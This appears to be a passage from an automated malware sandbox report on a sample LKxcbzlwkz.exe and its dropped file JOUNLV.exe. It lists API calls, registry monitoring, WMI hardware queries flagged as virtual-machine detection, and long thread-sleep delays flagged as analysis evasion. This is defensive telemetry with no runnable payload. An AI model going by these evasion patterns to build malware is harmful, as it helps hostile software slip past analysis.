                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMemory allocated: 1BB36520000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMemory allocated: 1BB4FE20000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597859Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597750Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597634Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595308Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595191Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595068Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 594926Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindow / User API: threadDelayed 4664Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWindow / User API: threadDelayed 3167Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWindow / User API: threadDelayed 6570Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeAPI coverage: 5.1 %
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe TID: 5252Thread sleep time: -46640s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -597859s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -597750s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -597634s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99764s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99656s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99546s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99437s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99328s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99218s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99109s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98890s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98780s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98671s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98561s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98453s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98298s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -98125s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -97989s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -97859s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -595308s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -595191s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -595068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -594926s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -594875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99862s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99735s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99598s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99438s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99313s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99187s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300Thread sleep time: -99067s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeThread sleep count: Count: 4664 delay: -10Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597859Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597750Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 597634Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99764Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99656Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99546Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99437Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99328Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99218Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99109Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98890Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98780Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98671Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98561Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98298Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 98125Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 97989Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 97859Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595308Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595191Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 595068Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 594926Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99862Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99735Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99598Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99438Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99313Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99187Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeThread delayed: delay time: 99067Jump to behavior
